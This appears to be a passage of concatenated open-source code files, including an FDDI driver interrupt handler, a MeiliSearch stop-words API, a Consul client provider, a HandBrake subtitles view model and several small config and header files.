if (smc->y[n].mib->fddiPORTPCMState == PC8_ACTIVE &&
smc->y[n].mib->fddiPORTNeighborType == TM)
return 0;
}
return 1;
}
/*
* Interrupt actions for PLC & PCM events
*/
void plc_irq(struct s_smc *smc, int np, unsigned int cmd)
/* int np; PHY index */
{
struct s_phy *phy = &smc->y[np] ;
struct s_plc *plc = &phy->plc ;
int n ;
#ifdef SUPERNET_3
int corr_mask ;
#endif /* SUPERNET_3 */
int i ;
if (np >= smc->s.numphys) {
plc->soft_err++ ;
return ;
}
if (cmd & PL_EBUF_ERR) { /* elastic buff. det. over-|underflow*/
/*
* Check whether the SRF Condition occurred.
*/
if (!plc->ebuf_cont && phy->mib->fddiPORTPCMState == PC8_ACTIVE){
/*
* This is the real Elasticity Error.
* More than one in a row are treated as a
* single one.
* Only count this in the active state.
*/
phy->mib->fddiPORTEBError_Ct ++ ;
}
plc->ebuf_err++ ;
if (plc->ebuf_cont <= 1000) {
/*
* Prevent counter from being wrapped after
* hanging years in that interrupt.
*/
plc->ebuf_cont++ ; /* Ebuf continuous error */
}
#ifdef SUPERNET_3
if (plc->ebuf_cont == 1000 &&
((inpw(PLC(np,PL_STATUS_A)) & PLC_REV_MASK) ==
PLC_REV_SN3)) {
/*
* This interrupt remeained high for at least
* 1000 consecutive interrupt calls.
*
* This is caused by a hardware error of the
* ORION part of the Supernet III chipset.
*
* Disable this bit from the mask.
*/
corr_mask = (plc_imsk_na & ~PL_EBUF_ERR) ;
outpw(PLC(np,PL_INTR_MASK),corr_mask);
/*
* Disconnect from the ring.
* Call the driver with the reset indication.
*/
queue_event(smc,EVENT_ECM,EC_DISCONNECT) ;
/*
* Make an error log entry.
*/
SMT_ERR_LOG(smc,SMT_E0136, SMT_E0136_MSG) ;
/*
* Indicate the Reset.
*/
drv_reset_indication(smc) ;
}
#endif /* SUPERNET_3 */
} else {
/* Reset the continuous error variable */
plc->ebuf_cont = 0 ; /* reset Ebuf continuous error */
}
if (cmd & PL_PHYINV) { /* physical layer invalid signal */
plc->phyinv++ ;
}
if (cmd & PL_VSYM_CTR) { /* violation symbol counter has incr.*/
plc->vsym_ctr++ ;
}
if (cmd & PL_MINI_CTR) { /* dep. on PLC_CNTRL_A's MINI_CTR_INT*/
plc->mini_ctr++ ;
}
if (cmd & PL_LE_CTR) { /* link error event counter */
int j ;
/*
* note: PL_LINK_ERR_CTR MUST be read to clear it
*/
j = inpw(PLC(np,PL_LE_THRESHOLD)) ;
i = inpw(PLC(np,PL_LINK_ERR_CTR)) ;
if (i < j) {
/* wrapped around */
i += 256 ;
}
if (phy->lem.lem_on) {
/* Note: Lem errors shall only be counted when
* link is ACTIVE or LCT is active.
*/
phy->lem.lem_errors += i ;
phy->mib->fddiPORTLem_Ct += i ;
}
}
if (cmd & PL_TPC_EXPIRED) { /* TPC timer reached zero */
if (plc->p_state == PS_LCT) {
/*
* end of LCT
*/
;
}
plc->tpc_exp++ ;
}
if (cmd & PL_LS_MATCH) { /* LS == LS in PLC_CNTRL_B's MATCH_LS*/
switch (inpw(PLC(np,PL_CNTRL_B)) & PL_MATCH_LS) {
case PL_I_IDLE : phy->curr_ls = PC_ILS ; break ;
case PL_I_HALT : phy->curr_ls = PC_HLS ; break ;
case PL_I_MASTR : phy->curr_ls = PC_MLS ; break ;
case PL_I_QUIET : phy->curr_ls = PC_QLS ; break ;
}
}
if (cmd & PL_PCM_BREAK) { /* PCM has entered the BREAK state */
int reason;
reason = inpw(PLC(np,PL_STATUS_B)) & PL_BREAK_REASON ;
switch (reason) {
case PL_B_PCS : plc->b_pcs++ ; break ;
case PL_B_TPC : plc->b_tpc++ ; break ;
case PL_B_TNE : plc->b_tne++ ; break ;
case PL_B_QLS : plc->b_qls++ ; break ;
case PL_B_ILS : plc->b_ils++ ; break ;
case PL_B_HLS : plc->b_hls++ ; break ;
}
/*jd 05-Aug-1999 changed: Bug #10419 */
DB_PCMN(1, "PLC %d: MDcF = %x", np, smc->e.DisconnectFlag);
if (smc->e.DisconnectFlag == FALSE) {
DB_PCMN(1, "PLC %d: restart (reason %x)", np, reason);
queue_event(smc,EVENT_PCM+np,PC_START) ;
}
else {
DB_PCMN(1, "PLC %d: NO!! restart (reason %x)",
np, reason);
}
return ;
}
/*
* If both CODE & ENABLE are set ignore enable
*/
if (cmd & PL_PCM_CODE) { /* receive last sign.-bit | LCT complete */
queue_event(smc,EVENT_PCM+np,PC_SIGNAL) ;
n = inpw(PLC(np,PL_RCV_VECTOR)) ;
for (i = 0 ; i < plc->p_bits ; i++) {
phy->r_val[plc->p_start+i] = n & 1 ;
n >>= 1 ;
}
}
else if (cmd & PL_PCM_ENABLED) { /* asserted SC_JOIN, scrub.completed*/
queue_event(smc,EVENT_PCM+np,PC_JOIN) ;
}
if (cmd & PL_TRACE_PROP) { /* MLS while PC8_ACTIV || PC2_TRACE */
/*PC22b*/
if (!phy->tr_flag) {
DB_PCMN(1, "PCM : irq TRACE_PROP %d %d",
np, smc->mib.fddiSMTECMState);
phy->tr_flag = TRUE ;
smc->e.trace_prop |= ENTITY_BIT(ENTITY_PHY(np)) ;
queue_event(smc,EVENT_ECM,EC_TRACE_PROP) ;
}
}
/*
* filter PLC glitch ???
* QLS || HLS only while in PC2_TRACE state
*/
if ((cmd & PL_SELF_TEST) && (phy->mib->fddiPORTPCMState == PC2_TRACE)) {
/*PC22a*/
if (smc->e.path_test == PT_PASSED) {
DB_PCMN(1, "PCM : state = %s %d",
get_pcmstate(smc, np),
phy->mib->fddiPORTPCMState);
smc->e.path_test = PT_PENDING ;
queue_event(smc,EVENT_ECM,EC_PATH_TEST) ;
}
}
if (cmd & PL_TNE_EXPIRED) { /* TNE: length of noise events */
/* break_required (TNE > NS_Max) */
if (phy->mib->fddiPORTPCMState == PC8_ACTIVE) {
if (!phy->tr_flag) {
DB_PCMN(1, "PCM %c : PC81 %s",
phy->phy_name, "NSE");
queue_event(smc, EVENT_PCM + np, PC_START);
return;
}
}
}
#if 0
if (cmd & PL_NP_ERR) { /* NP has requested to r/w an inv reg*/
/*
* It's a bug by AMD
*/
plc->np_err++ ;
}
/* pin inactiv (GND) */
if (cmd & PL_PARITY_ERR) { /* p. error dedected on TX9-0 inp */
plc->parity_err++ ;
}
if (cmd & PL_LSDO) { /* carrier detected */
;
}
#endif
}
#ifdef DEBUG
/*
* fill state struct
*/
void pcm_get_state(struct s_smc *smc, struct smt_state *state)
{
struct s_phy *phy ;
struct pcm_state *pcs ;
int i ;
int ii ;
short rbits ;
short tbits ;
struct fddi_mib_p *mib ;
for (i = 0, phy = smc->y, pcs = state->pcm_state ; i < NUMPHYS ;
i++ , phy++, pcs++ ) {
mib = phy->mib ;
pcs->pcm_type = (u_char) mib->fddiPORTMy_Type ;
pcs->pcm_state = (u_char) mib->fddiPORTPCMState ;
pcs->pcm_mode = phy->pc_mode ;
pcs->pcm_neighbor = (u_char) mib->fddiPORTNeighborType ;
pcs->pcm_bsf = mib->fddiPORTBS_Flag ;
pcs->pcm_lsf = phy->ls_flag ;
pcs->pcm_lct_fail = (u_char) mib->fddiPORTLCTFail_Ct ;
pcs->pcm_ls_rx = LS2MIB(sm_pm_get_ls(smc,i)) ;
for (ii = 0, rbits = tbits = 0 ; ii < NUMBITS ; ii++) {
rbits <<= 1 ;
tbits <<= 1 ;
if (phy->r_val[NUMBITS-1-ii])
rbits |= 1 ;
if (phy->t_val[NUMBITS-1-ii])
tbits |= 1 ;
}
pcs->pcm_r_val = rbits ;
pcs->pcm_t_val = tbits ;
}
}
int get_pcm_state(struct s_smc *smc, int np)
{
int pcs ;
SK_UNUSED(smc) ;
switch (inpw(PLC(np,PL_STATUS_B)) & PL_PCM_STATE) {
case PL_PC0 : pcs = PC_STOP ; break ;
case PL_PC1 : pcs = PC_START ; break ;
case PL_PC2 : pcs = PC_TRACE ; break ;
case PL_PC3 : pcs = PC_SIGNAL ; break ;
case PL_PC4 : pcs = PC_SIGNAL ; break ;
case PL_PC5 : pcs = PC_SIGNAL ; break ;
case PL_PC6 : pcs = PC_JOIN ; break ;
case PL_PC7 : pcs = PC_JOIN ; break ;
case PL_PC8 : pcs = PC_ENABLE ; break ;
case PL_PC9 : pcs = PC_MAINT ; break ;
default : pcs = PC_DISABLE ; break ;
}
return pcs;
}
char *get_linestate(struct s_smc *smc, int np)
{
char *ls = "" ;
SK_UNUSED(smc) ;
switch (inpw(PLC(np,PL_STATUS_A)) & PL_LINE_ST) {
case PL_L_NLS : ls = "NOISE" ; break ;
case PL_L_ALS : ls = "ACTIV" ; break ;
case PL_L_UND : ls = "UNDEF" ; break ;
case PL_L_ILS4: ls = "ILS 4" ; break ;
case PL_L_QLS : ls = "QLS" ; break ;
case PL_L_MLS : ls = "MLS" ; break ;
case PL_L_HLS : ls = "HLS" ; break ;
case PL_L_ILS16:ls = "ILS16" ; break ;
#ifdef lint
default: ls = "unknown" ; break ;
#endif
}
return ls;
}
char *get_pcmstate(struct s_smc *smc, int np)
{
char *pcs ;
SK_UNUSED(smc) ;
switch (inpw(PLC(np,PL_STATUS_B)) & PL_PCM_STATE) {
case PL_PC0 : pcs = "OFF" ; break ;
case PL_PC1 : pcs = "BREAK" ; break ;
case PL_PC2 : pcs = "TRACE" ; break ;
case PL_PC3 : pcs = "CONNECT"; break ;
case PL_PC4 : pcs = "NEXT" ; break ;
case PL_PC5 : pcs = "SIGNAL" ; break ;
case PL_PC6 : pcs = "JOIN" ; break ;
case PL_PC7 : pcs = "VERIFY" ; break ;
case PL_PC8 : pcs = "ACTIV" ; break ;
case PL_PC9 : pcs = "MAINT" ; break ;
default : pcs = "UNKNOWN" ; break ;
}
return pcs;
}
void list_phy(struct s_smc *smc)
{
struct s_plc *plc ;
int np ;
for (np = 0 ; np < NUMPHYS ; np++) {
plc = &smc->y[np].plc ;
printf("PHY %d:\tERRORS\t\t\tBREAK_REASONS\t\tSTATES:\n",np) ;
printf("\tsoft_error: %ld \t\tPC_Start : %ld\n",
plc->soft_err,plc->b_pcs);
printf("\tparity_err: %ld \t\tTPC exp. : %ld\t\tLine: %s\n",
plc->parity_err,plc->b_tpc,get_linestate(smc,np)) ;
printf("\tebuf_error: %ld \t\tTNE exp. : %ld\n",
plc->ebuf_err,plc->b_tne) ;
printf("\tphyinvalid: %ld \t\tQLS det. : %ld\t\tPCM : %s\n",
plc->phyinv,plc->b_qls,get_pcmstate(smc,np)) ;
printf("\tviosym_ctr: %ld \t\tILS det. : %ld\n",
plc->vsym_ctr,plc->b_ils) ;
printf("\tmingap_ctr: %ld \t\tHLS det. : %ld\n",
plc->mini_ctr,plc->b_hls) ;
printf("\tnodepr_err: %ld\n",plc->np_err) ;
printf("\tTPC_exp : %ld\n",plc->tpc_exp) ;
printf("\tLEM_err : %ld\n",smc->y[np].lem.lem_errors) ;
}
}
#ifdef CONCENTRATOR
void pcm_lem_dump(struct s_smc *smc)
{
int i ;
struct s_phy *phy ;
struct fddi_mib_p *mib ;
char *entostring() ;
printf("PHY errors BER\n") ;
printf("----------------------\n") ;
for (i = 0,phy = smc->y ; i < NUMPHYS ; i++,phy++) {
if (!plc_is_installed(smc,i))
continue ;
mib = phy->mib ;
printf("%s\t%ld\t10E-%d\n",
entostring(smc,ENTITY_PHY(i)),
mib->fddiPORTLem_Ct,
mib->fddiPORTLer_Estimate) ;
}
}
#endif
#endif
| {
"pile_set_name": "Github"
} |
include ../../../Make.helper
COMPILE_IDS:=$(call config_ids,../compile_options.config)
TABLES = $(foreach COMPILE_ID,$(COMPILE_IDS),tbl-count-$(COMPILE_ID).tex)
CONFIG_FILES=index-filter.config ../index.config ../test_case.config
all: count.pdf
count.pdf: count.tex
@echo "Use pdflatex to generate count.pdf"
@pdflatex count.tex >> LaTeX.Log 2>&1
count.tex: ../results/all.txt ../../basic_functions.R count.R $(CONFIG_FILES)
@echo "Use R to generate count.tex"
@R --vanilla < count.R > R.log 2>&1
clean:
rm -f $(TABLES) count.pdf count.aux count.tex \
count.log R.log LaTeX.log
| {
"pile_set_name": "Github"
} |
// Automatically generated from TypeScript type definitions provided by
// DefinitelyTyped (https://github.com/DefinitelyTyped/DefinitelyTyped),
// which is licensed under the MIT license; see file DefinitelyTyped-LICENSE
// in parent directory.
// Type definitions for Node.js 10.5.x
// Project: http://nodejs.org/
// Definitions by: Microsoft TypeScript <http://typescriptlang.org>
// DefinitelyTyped <https://github.com/DefinitelyTyped/DefinitelyTyped>
// Parambir Singh <https://github.com/parambirs>
// Christian Vaagland Tellnes <https://github.com/tellnes>
// Wilco Bakker <https://github.com/WilcoBakker>
// Nicolas Voigt <https://github.com/octo-sniffle>
// Chigozirim C. <https://github.com/smac89>
// Flarna <https://github.com/Flarna>
// Mariusz Wiktorczyk <https://github.com/mwiktorczyk>
// wwwy3y3 <https://github.com/wwwy3y3>
// Deividas Bakanas <https://github.com/DeividasBakanas>
// Kelvin Jin <https://github.com/kjin>
// Alvis HT Tang <https://github.com/alvis>
// Sebastian Silbermann <https://github.com/eps1lon>
// Hannes Magnusson <https://github.com/Hannes-Magnusson-CK>
// Alberto Schiabel <https://github.com/jkomyno>
// Klaus Meinhardt <https://github.com/ajafff>
// Huw <https://github.com/hoo29>
// Nicolas Even <https://github.com/n-e>
// Bruno Scheufler <https://github.com/brunoscheufler>
// Mohsen Azimi <https://github.com/mohsen1>
// Hoàng Văn Khải <https://github.com/KSXGitHub>
// Alexander T. <https://github.com/a-tarasyuk>
// Lishude <https://github.com/islishude>
// Andrew Makarov <https://github.com/r3nya>
// Zane Hannan AU <https://github.com/ZaneHannanAU>
// Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped
/**
* @externs
* @fileoverview Definitions for module "console"
*/
module.exports = console;
| {
"pile_set_name": "Github"
} |
[Desktop Entry]
Version=1.0
Name=VLC
GenericName=VLC media player
Comment=Read, capture, broadcast your multimedia streams
Exec=vlc.wrapper
TryExec=vlc.wrapper
Icon=vlc
Terminal=false
Type=Application
Categories=AudioVideo;Player;Recorder;
MimeType=video/dv;video/mpeg;video/x-mpeg;video/msvideo;video/quicktime;video/x-anim;video/x-avi;video/x-ms-asf;video/x-ms-wmv;video/x-msvideo;video/x-nsv;video/x-flc;video/x-fli;video/x-flv;video/vnd.rn-realvideo;video/mp4;video/mp4v-es;video/mp2t;application/ogg;application/x-ogg;video/x-ogm+ogg;audio/x-vorbis+ogg;audio/ogg;video/ogg;application/x-matroska;audio/x-matroska;video/x-matroska;video/webm;audio/webm;audio/x-mp3;audio/x-mpeg;audio/mpeg;audio/x-wav;audio/x-mpegurl;audio/x-scpls;audio/x-m4a;audio/x-ms-asf;audio/x-ms-asx;audio/x-ms-wax;application/vnd.rn-realmedia;audio/x-real-audio;audio/x-pn-realaudio;application/x-flac;audio/x-flac;application/x-shockwave-flash;misc/ultravox;audio/vnd.rn-realaudio;audio/x-pn-aiff;audio/x-pn-au;audio/x-pn-wav;audio/x-pn-windows-acm;image/vnd.rn-realpix;audio/x-pn-realaudio-plugin;application/x-extension-mp4;audio/mp4;audio/amr;audio/amr-wb;x-content/video-vcd;x-content/video-svcd;x-content/video-dvd;x-content/audio-cdda;x-content/audio-player;application/xspf+xml;x-scheme-handler/mms;x-scheme-handler/rtmp;x-scheme-handler/rtsp;video/vnd.mpegurl;
Keywords=Player;Capture;DVD;Audio;Video;Server;Broadcast;
[AppImageHub]
# Dear upstream developer, please include update information in your AppImage
# (e.g., with appimagetool -u) so that users can easily update the AppImage
X-AppImage-Signature=no valid OpenPGP data found. the signature could not be verified. Please remember that the signature file (.sig or .asc) should be the first file given on the command line.
X-AppImage-Type=2
X-AppImage-Architecture=x86_64
| {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Jul 6 2018 12:02:43).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2015 by Steve Nygard.
//
#import <AppKit/NSViewController.h>
#import "NSTabViewDelegate-Protocol.h"
#import "NSTableViewDataSource-Protocol.h"
@class MSDocument, NSArray, NSMenu, NSString, NSTableView;
@interface MSManageForeignSymbolsView : NSViewController <NSTableViewDataSource, NSTabViewDelegate>
{
BOOL _cogEnabled;
MSDocument *_document;
NSTableView *_tableView;
NSArray *_symbols;
NSMenu *_contextMenu;
}
- (void).cxx_destruct;
@property(retain, nonatomic) NSMenu *contextMenu; // @synthesize contextMenu=_contextMenu;
@property(nonatomic) BOOL cogEnabled; // @synthesize cogEnabled=_cogEnabled;
@property(retain, nonatomic) NSArray *symbols; // @synthesize symbols=_symbols;
@property(retain, nonatomic) NSTableView *tableView; // @synthesize tableView=_tableView;
@property(retain, nonatomic) MSDocument *document; // @synthesize document=_document;
- (void)unlinkFromLibrary:(id)arg1;
- (void)editInLibrary:(id)arg1;
- (BOOL)validateMenuItem:(id)arg1;
- (void)showContextMenu:(id)arg1;
- (void)tableViewSelectionDidChange:(id)arg1;
- (id)tableView:(id)arg1 objectValueForTableColumn:(id)arg2 row:(long long)arg3;
- (long long)numberOfRowsInTableView:(id)arg1;
- (void)viewDidAppear;
- (void)viewDidLoad;
- (void)buildSymbolList;
// Remaining properties
@property(readonly, copy) NSString *debugDescription;
@property(readonly, copy) NSString *description;
@property(readonly) unsigned long long hash;
@property(readonly) Class superclass;
@end
| {
"pile_set_name": "Github"
} |
use actix_web::{web, HttpResponse};
use actix_web::{delete, get, post};
use meilisearch_core::settings::{SettingsUpdate, UpdateState};
use std::collections::BTreeSet;
use crate::error::{Error, ResponseError};
use crate::helpers::Authentication;
use crate::routes::{IndexParam, IndexUpdateResponse};
use crate::Data;
pub fn services(cfg: &mut web::ServiceConfig) {
cfg.service(get).service(update).service(delete);
}
#[get(
"/indexes/{index_uid}/settings/stop-words",
wrap = "Authentication::Private"
)]
async fn get(
data: web::Data<Data>,
path: web::Path<IndexParam>,
) -> Result<HttpResponse, ResponseError> {
let index = data
.db
.open_index(&path.index_uid)
.ok_or(Error::index_not_found(&path.index_uid))?;
let reader = data.db.main_read_txn()?;
let stop_words = index.main.stop_words(&reader)?;
Ok(HttpResponse::Ok().json(stop_words))
}
#[post(
"/indexes/{index_uid}/settings/stop-words",
wrap = "Authentication::Private"
)]
async fn update(
data: web::Data<Data>,
path: web::Path<IndexParam>,
body: web::Json<BTreeSet<String>>,
) -> Result<HttpResponse, ResponseError> {
let index = data
.db
.open_index(&path.index_uid)
.ok_or(Error::index_not_found(&path.index_uid))?;
let settings = SettingsUpdate {
stop_words: UpdateState::Update(body.into_inner()),
..SettingsUpdate::default()
};
let update_id = data.db.update_write(|w| index.settings_update(w, settings))?;
Ok(HttpResponse::Accepted().json(IndexUpdateResponse::with_id(update_id)))
}
#[delete(
"/indexes/{index_uid}/settings/stop-words",
wrap = "Authentication::Private"
)]
async fn delete(
data: web::Data<Data>,
path: web::Path<IndexParam>,
) -> Result<HttpResponse, ResponseError> {
let index = data
.db
.open_index(&path.index_uid)
.ok_or(Error::index_not_found(&path.index_uid))?;
let settings = SettingsUpdate {
stop_words: UpdateState::Clear,
..SettingsUpdate::default()
};
let update_id = data.db.update_write(|w| index.settings_update(w, settings))?;
Ok(HttpResponse::Accepted().json(IndexUpdateResponse::with_id(update_id)))
}
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Concurrent;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using Consul;
using Microsoft.Extensions.Logging;
using Surging.Core.Consul.Configurations;
using Surging.Core.Consul.Internal.Cluster.HealthChecks;
using Surging.Core.Consul.Internal.Cluster.Implementation.Selectors;
using Surging.Core.Consul.Internal.Cluster.Implementation.Selectors.Implementation;
using Surging.Core.CPlatform;
using Surging.Core.CPlatform.Address;
using Surging.Core.CPlatform.Exceptions;
using Surging.Core.CPlatform.Runtime.Client.Address.Resolvers.Implementation.Selectors;
using Level = Microsoft.Extensions.Logging.LogLevel;
namespace Surging.Core.Consul.Internal.Implementation
{
public class DefaultConsulClientProvider : IConsulClientProvider
{
private ConfigInfo _config;
private readonly IHealthCheckService _healthCheckService;
private readonly IConsulAddressSelector _consulAddressSelector;
private readonly ILogger<DefaultConsulClientProvider> _logger;
private readonly ConcurrentDictionary<string, IAddressSelector> _addressSelectors = new
ConcurrentDictionary<string, IAddressSelector>();
private readonly ConcurrentDictionary<AddressModel, ConsulClient> _consulClients = new
ConcurrentDictionary<AddressModel, ConsulClient>();
public DefaultConsulClientProvider(ConfigInfo config, IHealthCheckService healthCheckService, IConsulAddressSelector consulAddressSelector,
ILogger<DefaultConsulClientProvider> logger)
{
_config = config;
_healthCheckService = healthCheckService;
_consulAddressSelector = consulAddressSelector;
_logger = logger;
}
public async ValueTask<ConsulClient> GetClient()
{
ConsulClient result = null;
var address = new List<AddressModel>();
foreach (var addressModel in _config.Addresses)
{
_healthCheckService.Monitor(addressModel);
var task = _healthCheckService.IsHealth(addressModel);
if (!(task.IsCompletedSuccessfully ? task.Result : await task))
{
continue;
}
address.Add(addressModel);
}
if (address.Count == 0)
{
if (_logger.IsEnabled(Level.Warning))
_logger.LogWarning($"找不到可用的注册中心地址。");
return null;
}
var vt = _consulAddressSelector.SelectAsync(new AddressSelectContext
{
Descriptor = new ServiceDescriptor { Id = nameof(DefaultConsulClientProvider) },
Address = address
});
var addr = vt.IsCompletedSuccessfully ? vt.Result : await vt;
if (addr != null)
{
var ipAddress = addr as IpAddressModel;
result = _consulClients.GetOrAdd(ipAddress, new ConsulClient(config =>
{
config.Address = new Uri($"http://{ipAddress.Ip}:{ipAddress.Port}");
}, null, h => { h.UseProxy = false; h.Proxy = null; }));
}
return result;
}
public async ValueTask<IEnumerable<ConsulClient>> GetClients()
{
var result = new List<ConsulClient>();
foreach (var address in _config.Addresses)
{
var ipAddress = address as IpAddressModel;
if (await _healthCheckService.IsHealth(address))
{
result.Add(_consulClients.GetOrAdd(ipAddress, new ConsulClient(config =>
{
config.Address = new Uri($"http://{ipAddress.Ip}:{ipAddress.Port}");
}, null, h => { h.UseProxy = false; h.Proxy = null; })));
}
}
return result;
}
public async ValueTask Check()
{
foreach (var address in _config.Addresses)
{
if (!await _healthCheckService.IsHealth(address))
{
throw new RegisterConnectionException(string.Format("注册中心{0}连接异常,请联系管理员", address.ToString()));
}
}
}
}
}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.pinot.thirdeye.dashboard.resources.v2;
import com.google.inject.Inject;
import com.google.inject.Singleton;
import org.apache.pinot.thirdeye.config.ConfigNamespace;
import org.apache.pinot.thirdeye.datalayer.bao.ConfigManager;
import java.io.IOException;
import java.util.List;
import java.util.Map;
import javax.ws.rs.DELETE;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import org.codehaus.jackson.map.ObjectMapper;
import org.codehaus.jackson.type.TypeReference;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
@Produces(MediaType.APPLICATION_JSON)
@Singleton
public class ConfigResource {
private final static Logger LOG = LoggerFactory.getLogger(ConfigResource.class);
private final ConfigManager configDAO;
@Inject
public ConfigResource(ConfigManager configDAO) {
this.configDAO = configDAO;
}
@GET
@Path("/{namespace}/{name}")
public Object get(
@PathParam("namespace") String namespace,
@PathParam("name") String name) {
return makeNamespace(namespace).get(name);
}
@POST
@Path("/{namespace}/{name}")
public void put(
@PathParam("namespace") String namespace,
@PathParam("name") String name,
String payload) throws IOException {
ConfigNamespace cn = makeNamespace(namespace);
// determine suitable representation
// map
try {
cn.put(name, new ObjectMapper().readValue(payload, new TypeReference<Map<String, ?>>() {}));
LOG.info("Storing MAP '{}':'{}' = '{}'", namespace, name, payload);
return;
} catch (Exception ignore) {
// left blank
}
// list
try {
cn.put(name, new ObjectMapper().readValue(payload, new TypeReference<List<?>>() {}));
LOG.info("Storing LIST '{}':'{}' = '{}'", namespace, name, payload);
return;
} catch (Exception ignore) {
// left blank
}
// string
cn.put(name, payload);
LOG.info("Storing STRING '{}':'{}' = '{}'", namespace, name, payload);
}
@GET
@Path("/{namespace}/")
public Map<String, Object> list(
@PathParam("namespace") String namespace) {
LOG.warn("Call to a deprecated end point " + "/config/{namespace}/ " + getClass().getName());
return makeNamespace(namespace).getAll();
}
@DELETE
@Path("/{namespace}/{name}")
public void delete(
@PathParam("namespace") String namespace,
@PathParam("name") String name) throws IOException {
makeNamespace(namespace).delete(name);
}
private ConfigNamespace makeNamespace(String namespace) {
return new ConfigNamespace(namespace, this.configDAO);
}
}
| {
"pile_set_name": "Github"
} |
#include <unistd.h>
#include <time.h>
unsigned sleep(unsigned seconds)
{
struct timespec tv = { .tv_sec = seconds, .tv_nsec = 0 };
if (nanosleep(&tv, &tv))
return tv.tv_sec;
return 0;
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:orientation="vertical">
<TextView
android:id="@+id/tv_header"
android:layout_width="match_parent"
android:layout_height="wrap_content"
android:layout_marginBottom="10dp"
android:background="@color/colorPrimary"
android:gravity="center"
android:textAllCaps="true"
android:textColor="@color/colorAccent"
tools:text="Repositories user" />
<android.support.v4.widget.SwipeRefreshLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:id="@+id/srl_repos"
android:layout_width="match_parent"
android:layout_height="wrap_content">
<android.support.v7.widget.RecyclerView
android:id="@+id/rv_repos"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:scrollbars="vertical"
tools:listitem="@layout/repo_view" />
</android.support.v4.widget.SwipeRefreshLayout>
</LinearLayout>
| {
"pile_set_name": "Github"
} |
// --------------------------------------------------------------------------------------------------------------------
// <copyright file="SubtitlesViewModel.cs" company="HandBrake Project (http://handbrake.fr)">
// This file is part of the HandBrake source code - It may be used under the terms of the GNU General Public License.
// </copyright>
// <summary>
// The Subtitles View Model
// </summary>
// --------------------------------------------------------------------------------------------------------------------
namespace HandBrakeWPF.ViewModels
{
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Windows;
using Caliburn.Micro;
using HandBrake.Interop.Utilities;
using HandBrakeWPF.EventArgs;
using HandBrakeWPF.Model.Subtitles;
using HandBrakeWPF.Properties;
using HandBrakeWPF.Services.Interfaces;
using HandBrakeWPF.Services.Presets.Model;
using HandBrakeWPF.Services.Scan.Model;
using HandBrakeWPF.ViewModels.Interfaces;
using HandBrakeWPF.Views;
using Microsoft.Win32;
using EncodeTask = HandBrakeWPF.Services.Encode.Model.EncodeTask;
using OutputFormat = HandBrakeWPF.Services.Encode.Model.Models.OutputFormat;
using SubtitleTrack = HandBrakeWPF.Services.Encode.Model.Models.SubtitleTrack;
using SubtitleType = HandBrakeWPF.Services.Encode.Model.Models.SubtitleType;
/// <summary>
/// The Subtitles View Model
/// </summary>
public class SubtitlesViewModel : ViewModelBase, ISubtitlesViewModel
{
private readonly IErrorService errorService;
private readonly IWindowManager windowManager;
#region Constants and Fields
private readonly Subtitle foreignAudioSearchTrack;
private IList<Subtitle> sourceTracks;
#endregion
#region Constructors and Destructors
/// <summary>
/// Initializes a new instance of the <see cref="HandBrakeWPF.ViewModels.SubtitlesViewModel"/> class.
/// </summary>
/// <param name="errorService">
/// The Error Service
/// </param>
/// <param name="windowManager">
/// The window Manager.
/// </param>
public SubtitlesViewModel(IErrorService errorService, IWindowManager windowManager)
{
this.errorService = errorService;
this.windowManager = windowManager;
this.SubtitleDefaultsViewModel = new SubtitlesDefaultsViewModel();
this.Task = new EncodeTask();
this.Langauges = LanguageUtilities.MapLanguages().Keys;
this.CharacterCodes = CharCodesUtilities.GetCharacterCodes();
this.foreignAudioSearchTrack = new Subtitle { SubtitleType = SubtitleType.ForeignAudioSearch, Language = Resources.SubtitleViewModel_ForeignAudioSearch };
this.SourceTracks = new List<Subtitle> { this.foreignAudioSearchTrack };
}
#endregion
public event EventHandler<TabStatusEventArgs> TabStatusChanged;
#region Properties
/// <summary>
/// Gets or sets the audio defaults view model.
/// </summary>
public ISubtitlesDefaultsViewModel SubtitleDefaultsViewModel { get; set; }
/// <summary>
/// Gets or sets CharacterCodes.
/// </summary>
public IEnumerable<string> CharacterCodes { get; set; }
/// <summary>
/// Gets or sets Langauges.
/// </summary>
public IEnumerable<string> Langauges { get; set; }
/// <summary>
/// Gets or sets SourceTracks.
/// </summary>
public IList<Subtitle> SourceTracks
{
get
{
return this.sourceTracks;
}
set
{
this.sourceTracks = value;
this.NotifyOfPropertyChange(() => this.SourceTracks);
}
}
/// <summary>
/// Gets or sets Task.
/// </summary>
public EncodeTask Task { get; set; }
/// <summary>
/// Gets the panel title.
/// </summary>
public string PanelTitle
{
get
{
return Resources.SubtitlesViewModel_SubTracks;
}
}
/// <summary>
/// Gets the switch display title.
/// </summary>
public string SwitchDisplayTitle
{
get
{
return Resources.SubtitlesViewModel_ConfigureDefaults;
}
}
/// <summary>
/// Gets the default audio behaviours.
/// </summary>
public SubtitleBehaviours SubtitleBehaviours
{
get
{
return this.SubtitleDefaultsViewModel.SubtitleBehaviours;
}
}
public bool IsBurnableOnly
{
get
{
